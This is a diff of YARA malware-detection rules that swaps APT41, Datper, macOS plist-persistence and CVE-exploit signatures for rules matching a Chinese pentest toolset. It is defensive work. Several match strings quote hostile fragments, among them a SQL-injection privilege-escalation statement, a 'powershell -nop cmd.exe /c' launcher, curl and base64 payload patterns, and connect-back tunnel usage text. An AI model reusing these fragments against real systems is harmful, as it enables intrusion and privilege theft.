-		id = "1e48d859-2da9-583e-80e5-8d59054cfb85"
-		date = "2019-08-07"
+		id = "26e30df6-b1d9-5d82-b368-a4a904939aa3"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L137-L157"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1082-L1098"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dc35b78df1631b1c9650de2bac625a7bc629225f36fe5e32fbff829cb77dc9ac"
-		score = 75
-		quality = 85
+		hash = "dccd163e94a774b01f90c1e79f186894e2f27de3"
+		logic_hash = "66a77c1fbfecdc02f591c12f69b46e39b7077dfbb5ed2a26a7dcfb11c8b464dc"
+		score = 70
+		quality = 60
 		tags = "FILE"
-		hash1 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "H:\\RBDoor\\" ascii
-		$s1 = "PlusDll.dll" fullword ascii
-		$s2 = "ShutDownEvent.dll" fullword ascii
-		$s3 = "\\svchost.exe" ascii
+		$s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii
+		$s2 = "To.exe" fullword wide
+		$s3 = "by zj1244" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or pe.exports ( "DllMain_mem" ) or $x1 or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN : FILE
+rule SIGNATURE_BASE_CN_Honker_Grouppolicyremover : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON.BIN"
+		description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c8bd62b4-b882-5c04-aace-76dd4a21a784"
-		date = "2019-08-07"
+		id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L159-L180"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1100-L1116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c6557bff952454482271d1b52fb37b2dd0471abd237449fd9c94b293ea5218b3"
-		score = 90
+		hash = "7475d694e189b35899a2baa462957ac3687513e5"
+		logic_hash = "936d5dea2d44f638abfb5e42f45c0678bcbf769b575b5056db1a1fc41d1643be"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994"
-		hash2 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "PlusDll.dll" fullword ascii
-		$s2 = "\\Device\\PORTLESS_DeviceName" wide
-		$s3 = "%s%s\\Security" fullword ascii
-		$s4 = "%s\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
-		$s5 = "%s%s\\Enum" fullword ascii
+		$s0 = "GP_killer.EXE" fullword wide
+		$s1 = "GP_killer Microsoft " fullword wide
+		$s2 = "SHDeleteKeyA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Wordpressscanner : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON.BIN"
+		description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37d6a44d-7811-5e87-84e2-b2a8b3da3124"
-		date = "2019-08-07"
+		id = "79195823-f88b-5c28-8b99-a43a9d6c94af"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L182-L200"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1118-L1135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1e3d622b4719962f59d95dbf1374c526c22461dd1d9313504f28e8e5c9184272"
-		score = 85
+		hash = "0b3c5015ba3616cbc616fc9ba805fea73e98bc83"
+		logic_hash = "c6c36ad5ff0ddfbc41464008d293d453bf2d312a6db885217785adf816bd8b20"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
-		hash2 = "c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\Double\\Door_wh\\" ascii
-		$x2 = "[Stone] Config --> 2k3 TCP Positive Logout." fullword ascii
-		$x3 = "\\RbDoorX64.pdb" ascii
-		$x4 = "RbDoor, Version 1.0" fullword wide
-		$x5 = "About RbDoor" fullword wide
+		$s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s1 = "(http://www.eyuyan.com)" fullword wide
+		$s2 = "GetConnectString" fullword ascii
+		$s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_Revokedcert_Aug19_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Htran_V2_40_Htran20 : FILE
 {
 	meta:
-		description = "Detects revoked certificates used by APT41 group"
+		description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f107cc42-58ec-500d-b1c3-27e9e00826aa"
-		date = "2019-08-07"
+		id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L202-L231"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1137-L1156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f78c1310f99ac1993b01f3469f2f8e0765b79b2ea17fc6e7cff4e99949ca1139"
-		score = 60
+		hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
+		logic_hash = "41a85430875df622e7940ef26c6eceaa4e0720b2995521fbb2d4b072207c8e15"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "%s -slave  ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii
+		$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "%s -connect ConnectHost [ConnectPort]       Default:%d" fullword ascii
+		$s5 = "[+] got, ip:%s, port:%d" fullword ascii
+		$s6 = "[-] There is a error...Create a new connection." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" or pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" or pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:73:85:f7:02" or pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" or pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" or pe.signatures [ i ] . serial == "53:0c:e1:4c:81:f3:62:10:a1:68:2a:ff:17:9e:25:80" or pe.signatures [ i ] . serial == "54:c6:c1:40:6f:b4:ac:b5:d2:06:74:e9:93:92:c6:3e" or pe.signatures [ i ] . serial == "fd:f2:83:7d:ac:12:b7:bb:30:ad:05:8f:99:9e:cf:00" or pe.signatures [ i ] . serial == "18:63:79:57:5a:31:46:e2:6b:ef:c9:0a:58:0d:1b:d2" or pe.signatures [ i ] . serial == "5c:2f:97:a3:1a:bc:32:b0:8c:ac:01:00:59:8f:32:f6" or pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" or pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" or pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" or pe.signatures [ i ] . serial == "30:d3:c1:67:26:5b:52:0c:b8:7f:25:84:4f:95:cb:04" or pe.signatures [ i ] . serial == "1e:52:bb:f5:c9:0e:c1:64:d0:5b:e0:e4:16:61:52:5f" or pe.signatures [ i ] . serial == "25:f8:78:22:de:56:d3:98:21:59:28:73:ea:09:ca:37" or pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_CN_ELF_Speculoos_Backdoor : FILE
+rule SIGNATURE_BASE_CN_Honker_Dictionarygenerator : FILE
 {
 	meta:
-		description = "Detects Speculoos Backdoor used by APT41"
+		description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "efe2b368-33af-5382-a5f0-0e7dd7f4dea4"
-		date = "2020-04-14"
+		id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L233-L267"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1158-L1173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee4cbbc5fc51fb24cbf6017dfb4763ac72a0b23a3b6e794b909e678ebfbabc03"
-		score = 90
+		hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
+		logic_hash = "228bdbca3eb206e22a130e91caa2486174efba9356dbee67e80333c0cf0bb643"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167"
-		hash2 = "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 2F 70 72 69 76 61 74 65 2F 76 61 72 00 68 77 2E
-               70 68 79 73 6D 65 6D 00 68 77 2E 75 73 65 72 6D
-               65 6D 00 4E 41 2D 4E 41 2D 4E 41 2D 4E 41 2D 4E
-               41 2D 4E 41 00 6C 6F 30 00 00 00 00 25 30 32 78
-               2D 25 30 32 78 2D 25 30 32 78 2D 25 30 32 78 2D
-               25 30 32 78 2D 25 30 32 78 0A 00 72 00 4E 41 00
-               75 6E 61 6D 65 20 2D 76 }
-		$s1 = "badshell" ascii fullword
-		$s2 = "hw.physmem" ascii fullword
-		$s3 = "uname -v" ascii fullword
-		$s4 = "uname -s" ascii fullword
-		$s5 = "machdep.tsc_freq" ascii fullword
-		$s6 = "/usr/sbin/config.bak" ascii fullword
-		$s7 = "enter MessageLoop..." ascii fullword
-		$s8 = "exit StartCBProcess..." ascii fullword
-		$sc1 = { 72 6D 20 2D 72 66 20 22 25 73 22 00 2F 70 72 6F
-               63 2F }
+		$s1 = "`PasswordBuilder" fullword ascii
+		$s2 = "cracker" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 600KB and 1 of ( $x* ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3650KB and all of them
 }
-
-rule SIGNATURE_BASE_APT12_Malware_Aug17 : FILE
+rule SIGNATURE_BASE_CN_Honker_Ms11080_Withcmd : FILE
 {
 	meta:
-		description = "Detects APT 12 Malware"
+		description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c9cd68f-b839-5c99-a9f5-14c2d8a28bec"
-		date = "2017-08-30"
+		id = "38c12697-7e52-5713-a566-6047abfa229b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.macnica.net/blog/2017/08/post-fb81.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt12_malware.yar#L13-L25"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1175-L1190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0766376689540680f8db699f64aa89fc32ddef619a74864eb816c598b8d08c8a"
-		score = 75
+		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
+		logic_hash = "1f673f845ad40efae143ec244c7c70d1e26fb51f22be6bf445085c6a7379f193"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dc7521c00ec2534cf494c0263ddf67ea4ba9915eb17bdc0b3ebe9e840ec63643"
-		hash2 = "42da51b69bd6625244921a4eef9a2a10153e012a3213e8e9877cf831aea3eced"
+
+	strings:
+		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
+		$s3 = "[>] create pipe error" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "9ba915fd04f248ad62e856c7238c0264" )
+		uint16( 0 ) == 0x5a4d and filesize < 340KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Macos_Plist_Suspicious : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V2 : FILE
 {
 	meta:
-		description = "Suspicious PLIST files in MacOS (possible malware persistence)"
-		author = "John Lambert @JohnLaTwC"
-		id = "61b5986d-35c9-5e1a-a077-14cecdbed36f"
-		date = "2018-12-14"
-		modified = "2025-06-03"
-		old_rule_name = "gen_malware_MacOS_plist_suspicious"
-		reference = "https://objective-see.com/blog/blog_0x3A.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_MacOS_plist_suspicious.yar#L1-L73"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "499b251a-e0e1-5550-825d-acab112be74b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1192-L1208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "52076ec107b5bcbbe35265dfc4034a6a25a453459d22392848980b22115f68bc"
-		score = 60
-		quality = 58
+		hash = "a995451d9108687b8892ad630a79660a021d670a"
+		logic_hash = "979f3fe9795798743f2a57aa3b82a34e304774de58ffda5278991cf5a753a8ba"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "0541fc6a11f4226d52ae3d4158deb8f50ed61b25bb5f889d446102e1ee57b76d"
-		hash2 = "6cc6abec7d203f99c43ce16630edc39451428d280b02739757f17fd01fc7dca3"
-		hash3 = "76eb97aba93979be06dbf0a872518f9514d0bb20b680c887d6fd5cc79dce3681"
-		hash4 = "8921e3f1955f7141d1231f8cfd95230143525f259e578fdc1dd98494f62ec4a1"
-		hash5 = "9a3fd0d2b0bca7d2f7e3c70cb15a7005a1afa1ce78371fd3fa9c526a288b64ce"
-		hash6 = "737355121685afc38854413d8a1657886f9aa24f54673953749386defe843017"
-		hash7 = "9b77622653934995ee8bb5562df311f5bb6d6719933e2671fe231a664da76d30"
-		hash8 = "c449f8115b4b939271cb92008a497457e1ab1cf2cbd8f4b58f7ba955cf5624f0"
-		hash9 = "cdb2fb9c8e84f0140824403ec32a2431fb357cd0f184c1790152834cc3ad3c1b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sr1 = "PropertyList-"
-		$sr2 = "<plist"
-		$p1 = "python" ascii
-		$p2 = "<string>-c" ascii
-		$v0 = /\<string\>[\/|\w]{0,20}\+[\/|\+|=|\w]{59,80}\<\/string\>/
-		$v1 = "curl " fullword
-		$v2 = "PAYLOAD_DATA"
-		$v3 = "base64"
-		$vb640 = /(AAQQBZAEwATwBBAEQAXwBCAEEAUwBFADYANA|AEEAWQBMAE8AQQBEAF8AQgBBAFMARQA2ADQA|BBWUxPQURfQkFTRTY0|QVlMT0FEX0JBU0U2N|UABBAFkATABPAEEARABfAEIAQQBTAEUANgA0A|UEFZTE9BRF9CQVNFNj)/
-		$vb641 = /(AHUAYgBwAHIAbwBjAGUAcwBzA|c3VicHJvY2Vzc|cwB1AGIAcAByAG8AYwBlAHMAcw|dWJwcm9jZXNz|MAdQBiAHAAcgBvAGMAZQBzAHMA|N1YnByb2Nlc3)/
-		$vb642 = "IyEvdXNy"
-		$vb643 = "IyAtKi0"
-		$vb644 = /(AGQAZABfAGgAZQBhAGQAZQByA|EAZABkAF8AaABlAGEAZABlAHIA|FkZF9oZWFkZX|YQBkAGQAXwBoAGUAYQBkAGUAcg|YWRkX2hlYWRlc|ZGRfaGVhZGVy)/
-		$fp1 = "&#10;do&#10;&#09;echo"
-		$fp2 = "<string>com.cisco.base64</string>"
-		$fp3 = "video/mp4;base64"
-		$fp4 = "<key>Content-Length</key>"
-		$fp5 = "<string>yara</string>"
-		$fp6 = "<key>Frameworks/base64.framework</key>" ascii
-		$fp7 = "<key>Headers/base64.h</key>" ascii
-		$fp8 = "database64" ascii fullword
-		$fp9 = "<!-- last arg will be replaced by the installer script -->" ascii
-		$fp10 = "<key>/usr/local/bin/python</key>"
-		$fp11 = "<key>/usr/bin/ruby</key>"
-		$fp12 = "installer script"
-		$fp13 = "backupgridsoftware."
-		$fp14 = "<string>3d45fa493e6db1537783a6ad37e464a9</string>"
-		$fp15 = "<string>1815ecf78ce641b94f44d751588ed3ed</string>"
-		$fp16 = "<string>3df5ea4616954ada685d14179e43c4aa</string>"
-		$fp17 = "<string>1PasswordSafariAppExtension</string>"
+		$s1 = "LOADER ERROR" fullword ascii
+		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s3 = "2011-2012 T00LS&RICES" fullword wide
 
 	condition:
-		filesize < 20KB and uint32be( 0 ) == 0x3c3f786d and all of ( $sr* ) and @sr2 [ 1 ] < 0x100 and ( 1 of ( $v* ) or all of ( $p* ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-
-rule SIGNATURE_BASE_Datper_Backdoor : FILE
+rule SIGNATURE_BASE_CN_Honker_HASH_32 : FILE
 {
 	meta:
-		description = "Detects Datper Malware"
+		description = "Sample from CN Honker Pentest Toolset - file 32.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "547db8bb-cc02-5521-8b85-845b1652fee9"
-		date = "2017-08-21"
+		id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tick_datper.yar#L13-L45"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1210-L1226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eacdc648226f20fa3847f0b5e8cafcee59cc1c6274cabb885db297f5b5fceafb"
-		score = 75
+		hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
+		logic_hash = "819e70979ae1d5e237bbadaa52b504c566b4b7436747ceb0d72e206e4fc45708"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849"
-		hash2 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
-		hash3 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
-		hash4 = "12d9b4ec7f8ae42c67a6fd030efb027137dbe29e63f6f669eb932d0299fbe82f"
-		hash5 = "2384e8ad8eee6db1e69b3ee7b6b3d01ae09f99a86901a0a87fb2788c1115090c"
-		hash6 = "1e511c32cdf8abe23d8ba7c39da5ce7fc6c87fdb551c9fc3265ee22ac4076e27"
-		hash7 = "7bc042b9a599e1024a668b9921e2a42a02545429cf446d5b3d21f20185afa6ce"
 
 	strings:
-		$s1 = "RtlGetCo" fullword ascii
-		$s2 = "hutils" fullword ascii
-		$s3 = "kza2FWU,f;\"3U&zpa3U(W`J" fullword ascii
-		$c1 = "dkkwldngn" fullword ascii
-		$c2 = "ndkkwqgcm" fullword ascii
+		$s5 = "[Undefined OS version]  Major: %d Minor: %d" fullword ascii
+		$s8 = "Try To Run As Administrator ..." fullword ascii
+		$s9 = "Specific LUID NOT found" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "58db98e2334746d349d607e4d73bc5ea" or pe.imphash ( ) == "8fbed921458af485ce84fb7d9b13899e" or ( 2 of ( $s* ) and 1 of ( $c* ) ) or ( $s3 and $c1 ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
 }
-rule SIGNATURE_BASE_EXP_Libre_Office_CVE_2018_16858 : CVE_2018_16858 FILE
+rule SIGNATURE_BASE_CN_Honker_Windows_Mstsc_Enhanced_RMDSTC : FILE
 {
 	meta:
-		description = "RCE in Libre Office with crafted ODT file (CVE-2018-16858)"
-		author = "John Lambert @JohnLaTwC / modified by Florian Roth"
-		id = "17a0a569-27bf-57ab-937e-8943442ae604"
-		date = "2019-02-01"
+		description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6e94327-cb79-5a7a-88bb-850177558978"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2018_16858.yar#L1-L17"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1228-L1243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "95a02b70c117947ff989e3e00868c2185142df9be751a3fefe21f18fa16a1a6f"
-		logic_hash = "6dd34350f24945ba5a594acae96dc00bb200841a645443a70a59006cea1db949"
-		score = 75
-		quality = 83
-		tags = "CVE-2018-16858, FILE"
+		hash = "3ca2b1b6f31219baf172abcc8f00f07f560e465f"
+		logic_hash = "de676b033613beebfe9fc5a71cf5f5911f0af35d34e77d56d222c6f00114dfb6"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "xlink:href=\"vnd.sun.star.script:" ascii nocase
-		$s2 = ".py$tempfilepager" ascii nocase
-		$tag = {3c 6f 66 66 69 63 65 3a 64 6f 63 }
+		$s0 = "zava zir5@163.com" fullword wide
+		$s1 = "By newccc" fullword wide
 
 	condition:
-		uint32be( 0 ) == 0x3c3f786d and $tag in ( 0 .. 0100 ) and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_CVE_2017_8759_Mal_HTA : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Mstsc_MSTSCAX : FILE
 {
 	meta:
-		description = "Detects malicious files related to CVE-2017-8759 - file cmd.hta"
+		description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e53b5149-fc94-5da5-8e35-7f09a9cd79fd"
-		date = "2017-09-14"
+		id = "9508b613-f897-5277-97e0-30e36fb5d747"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L11-L24"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1245-L1261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f98578104e411fcf75a46f8a0bc3e561c94d0ca4ad7c1aae2595d03a29efd74e"
-		score = 75
+		hash = "2fa006158b2d87b08f1778f032ab1b8e139e02c6"
+		logic_hash = "2bfe10ec4af5d0f32fc03714c0cb01d9b0d446daa67cc0cce0b83f6a57e7c5a5"
+		score = 70
 		quality = 85
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fee2ab286eb542c08fdfef29fabf7796a0a91083a0ee29ebae219168528294b5"
 
 	strings:
-		$x1 = "Error = Process.Create(\"powershell -nop cmd.exe /c" fullword ascii
+		$s1 = "ResetPasswordWWWx" fullword ascii
+		$s2 = "Terminal Server Redirected Printer Doc" fullword wide
+		$s3 = "Cleaning temp directory" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x683c and filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_CVE_2017_8759_Mal_Doc : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Scanner : FILE
 {
 	meta:
-		description = "Detects malicious files related to CVE-2017-8759 - file Doc1.doc"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48587c13-7661-5987-8331-732115f7823b"
-		date = "2017-09-14"
-		modified = "2023-11-21"
-		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L26-L45"
+		id = "80d4a950-24cb-55c7-903f-8788a71be7ac"
+		date = "2015-06-23"
+		modified = "2023-12-05"
